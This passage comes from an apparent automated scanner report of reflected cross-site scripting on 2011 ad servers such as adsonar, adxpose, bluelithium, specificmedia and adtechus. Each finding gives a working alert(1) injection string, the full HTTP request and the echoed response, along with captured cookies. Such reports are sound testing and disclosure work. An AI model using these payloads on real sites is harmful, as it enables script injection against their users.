Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549aa72b--><script>alert(1)</script>56c01c56ac8&pid=1900769&ps=-1&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:00 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3234


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1483549aa72b--><script>alert(1)</script>56c01c56ac8" -->
...[SNIP]...

3.51. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 98ad8--><script>alert(1)</script>818648b6a was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1483549&pid=1900769&ps=-198ad8--><script>alert(1)</script>818648b6a&zw=228&zh=215&url=http%3A//www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html&v=5&dct=CPAC%20winners%20and%20losers HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:05 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3667


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-198ad8--><script>alert(1)</script>818648b6a" -->
       <
...[SNIP]...

3.52. http://ads.adxpose.com/ads/ads.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 3feb5<script>alert(1)</script>2e70b7c5226 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0D346790CFB88D71D4593A30AB7CE8C9; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:37:09 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_YpffvxtzOKuYhLCm_405295693feb5<script>alert(1)</script>2e70b7c5226".replace(/[^\w\d]/g,""),"YpffvxtzOKuYhLCm_405295693feb5<script>
...[SNIP]...

3.53. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea33"-alert(1)-"3b4b2d0d84c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1570312&9ea33"-alert(1)-"3b4b2d0d84c=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hAPQwCgD01TAAAAAAAK2gDQAAAAAAAgAQAAIAAAAAAP8AAAABFWJSEwAAAAAAY04TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWOwUAAAAAAAIAAgAAAAAAmpmZmZmZ8T-amZmZmZnxP5qZmZmZmfE.mpmZmZmZ8T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADacgV4OXmhCUlS6anFfIVdJbtK4S9KioraJLUCAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D300x250%26s%3D667892%26r%3D1%26_salt%3D1162597115%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,f4e74ee2-37e2-11e0-a10f-001b24783b3e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:34:56 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 02:34:56 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9ea33"-alert(1)-"3b4b2d0d84c=1&Z=300x250&s=1570312&_salt=2802567516";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

3.54. http://ads.specificmedia.com/serve/v=5 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b714e'-alert(1)-'2181d872488 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:44 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 386
Expires: Sun, 13 Feb 2011 01:33:44 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0b714e'-alert(1)-'2181d872488;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.55. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.specificmedia.com
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc57b'-alert(1)-'40972d271a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=2;l=5434;cxt=99002376:2166629-99002135:2165456-99013532:2161575;kw=;ts=187841;smuid=uosDj9Liw_xRTA;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1 HTTP/1.1
Host: ads.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0502717091279373&output=html&h=250&slotname=5334629240&w=300&lmt=1297666157&flash=10.2.154&url=http%3A%2F%2Fwww.drudgereport.com%2F&dt=1297647258512&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297647258544&frm=0&adk=473711736&ga_vid=1491658047.1297647259&ga_sid=1297647259&ga_hid=1857945157&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=1010&eid=30143103&fu=0&ifi=1&dtd=95&xpc=y4g04mCIiz&p=http%3A//www.drudgereport.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; smu=5008.928757113086138685

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:33:44 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5007.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 19-Jan-2016 01:33:45 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 389
Expires: Sun, 13 Feb 2011 01:33:45 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write('<iframe src="http://ads.specificmedia.com/serve/v=5;m=3;l=5434;c=124229;b=785339;ts=20110213203344;p=ui%3DuosDj9Liw_xRTA%3Btr%3D7ypDys7SZ4F%3Btm%3D0-0&bc57b'-alert(1)-'40972d271a2=1;cxt=99002376:2166629-99002135:2165456-99013532:2161575" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.56. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ab782><script>alert(1)</script>6e76889d9da was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blankab782><script>alert(1)</script>6e76889d9da HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 321

<html><body><base target=_blankab782><script>alert(1)</script>6e76889d9da><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7
...[SNIP]...

3.57. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [AdId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of the AdId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25c14"><script>alert(1)</script>a4b96fa0e6e was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank25c14"><script>alert(1)</script>a4b96fa0e6e;adiframe=y">
...[SNIP]...

3.58. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b69b0"><script>alert(1)</script>eeb789feb65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 280

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECHb69b0"><script>alert(1)</script>eeb789feb65;AdId=1343354;BnId=-1;;target=_blank;adiframe=y">
...[SNIP]...

3.59. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 566fc><script>alert(1)</script>ed3badced5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&566fc><script>alert(1)</script>ed3badced5a=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 327

<html><body><base target=_blank&566fc><script>alert(1)</script>ed3badced5a=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C1
...[SNIP]...

3.60. http://adserver.adtechus.com/adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87299"><script>alert(1)</script>d8233ba9cbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153501.1.114456.A.0.4D588747.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 329

<html><body><base target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1403594%7C0%7C16%7CADTECH;AdId=1343354;BnId=-1;;target=_blank&87299"><script>alert(1)</script>d8233ba9cbc=1;adiframe=y">
...[SNIP]...

3.61. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f2f4"><script>alert(1)</script>fe7203a0cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn7f2f4"><script>alert(1)</script>fe7203a0cd3/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.62. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a3c"><script>alert(1)</script>9ea027e7c9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0e3a3c"><script>alert(1)</script>9ea027e7c9b/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

3.63. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3700"><script>alert(1)</script>c1d53990b82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

